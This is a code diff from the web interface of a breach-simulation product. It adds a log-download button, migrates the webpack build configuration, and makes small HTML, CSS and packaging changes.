import {Col} from 'react-bootstrap'; import {Button, Col} from 'react-bootstrap';
import JSONTree from 'react-json-tree' import JSONTree from 'react-json-tree'
import {DataTable} from 'react-data-components'; import {DataTable} from 'react-data-components';
import AuthComponent from '../AuthComponent'; import AuthComponent from '../AuthComponent';
import download from 'downloadjs'
const renderJson = (val) => <JSONTree data={val} level={1} theme="eighties" invertTheme={true} />; const renderJson = (val) => <JSONTree data={val} level={1} theme="eighties" invertTheme={true} />;
const renderTime = (val) => val.split('.')[0]; const renderTime = (val) => val.split('.')[0];
@ -28,21 +29,47 @@ class TelemetryPageComponent extends AuthComponent {
.then(res => this.setState({data: res.objects})); .then(res => this.setState({data: res.objects}));
}; };
downloadIslandLog = () => {
this.authFetch('/api/log/island/download')
.then(res => res.json())
.then(res => {
let filename = 'Island_log';
let logContent = res['log_file'];
download(logContent, filename, 'text/plain');
});
};
render() { render() {
return ( return (
<Col xs={12} lg={8}> <div>
<h1 className="page-title">Log</h1> <div>
<div className="data-table-container"> <Col xs={12} lg={8}>
<DataTable <h1 className="page-title">Log</h1>
keys="name" <div className="data-table-container">
columns={columns} <DataTable
initialData={this.state.data} keys="name"
initialPageLength={20} columns={columns}
initialSortBy={{ prop: 'timestamp', order: 'descending' }} initialData={this.state.data}
pageLengthOptions={[ 20, 50, 100 ]} initialPageLength={20}
/> initialSortBy={{ prop: 'timestamp', order: 'descending' }}
</div> pageLengthOptions={[ 20, 50, 100 ]}
</Col> />
</div>
</Col>
</div>
<div>
<Col xs={12} lg={8}>
<h1 className="page-title"> Monkey Island Logs </h1>
<div className="text-center" style={{marginBottom: '20px'}}>
<p style={{'marginBottom': '2em', 'fontSize': '1.2em'}}> Download Monkey Island internal log file </p>
<Button bsSize="large" onClick={()=> {
this.downloadIslandLog();
}}>
<i className="glyphicon glyphicon-download"/> Download </Button>
</div>
</Col>
</div>
</div>
); );
} }
} }

View File

@ -8,9 +8,6 @@
<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no">
</head> </head>
<body> <body>
<div id="app">Loading...</div> <div id="app"></div>
<script>__REACT_DEVTOOLS_GLOBAL_HOOK__ = parent.__REACT_DEVTOOLS_GLOBAL_HOOK__</script>
<script type="text/javascript" src="/assets/app.js"></script>
</body> </body>
</html> </html>

View File

@ -1,7 +1,7 @@
import StandardConfig from './StandardConfig'; import StandardConfig from './StandardConfig';
import AwsConfig from './AwsConfig'; import AwsConfig from './AwsConfig';
const SERVER_CONFIG_JSON = require('json-loader!../../../server_config.json'); const SERVER_CONFIG_JSON = require('../../../server_config.json');
const CONFIG_DICT = const CONFIG_DICT =
{ {

View File

@ -406,6 +406,10 @@ body {
padding: 0em; padding: 0em;
} }
.modal-dialog {
top: 30%;
}
/* Print report styling */ /* Print report styling */
@media print { @media print {

View File

@ -1,32 +1,73 @@
'use strict';
const path = require('path'); const path = require('path');
const args = require('minimist')(process.argv.slice(2)); const HtmlWebPackPlugin = require("html-webpack-plugin");
// List of allowed environments module.exports = {
const allowedEnvs = ['dev', 'dist', 'test']; module: {
rules: [
// Set the correct environment {
let env; test: /\.js$/,
if (args._.length > 0 && args._.indexOf('start') !== -1) { exclude: /node_modules/,
env = 'test'; use: {
} else if (args.env) { loader: "babel-loader"
env = args.env; }
} else { },
env = 'dev'; {
} test: /\.css$/,
process.env.REACT_WEBPACK_ENV = env; use: [
'style-loader',
/** 'css-loader'
* Build the webpack configuration ]
* @param {String} wantedEnv The wanted environment },
* @return {Object} Webpack config {
*/ test: /\.(ttf|eot|svg)(\?v=[0-9]\.[0-9]\.[0-9])?$/,
function buildConfig(wantedEnv) { use: {
let isValid = wantedEnv && wantedEnv.length > 0 && allowedEnvs.indexOf(wantedEnv) !== -1; loader: 'file-loader'
let validEnv = isValid ? wantedEnv : 'dev'; }
let config = require(path.join(__dirname, 'cfg/' + validEnv)); },
return config; {
} test: /\.woff(2)?(\?v=[0-9]\.[0-9]\.[0-9])?$/,
use: {
module.exports = buildConfig(env); loader: 'url-loader?limit=10000&mimetype=application/font-woff'
}
},
{
test: /\.(png|jpg|gif)$/,
use: {
loader: 'url-loader?limit=8192'
}
},
{
test: /\.html$/,
use: [
{
loader: "html-loader"
}
]
}
]
},
plugins: [
new HtmlWebPackPlugin({
template: "./src/index.html",
filename: "./index.html"
})
],
resolve: {
extensions: ['.js', '.jsx', '.css'],
modules: [
'node_modules',
path.resolve(__dirname, 'src/')
]
},
output: {
publicPath: '/'
},
devServer: {
proxy: {
'/api': {
target: 'https://localhost:5000',
secure: false
}
}
}
};

View File

@ -5,4 +5,4 @@ Homepage: http://www.guardicore.com
Priority: optional Priority: optional
Version: 1.0 Version: 1.0
Description: Guardicore Infection Monkey Island installation package Description: Guardicore Infection Monkey Island installation package
Depends: openssl, python-pip Depends: openssl, python-pip, python-dev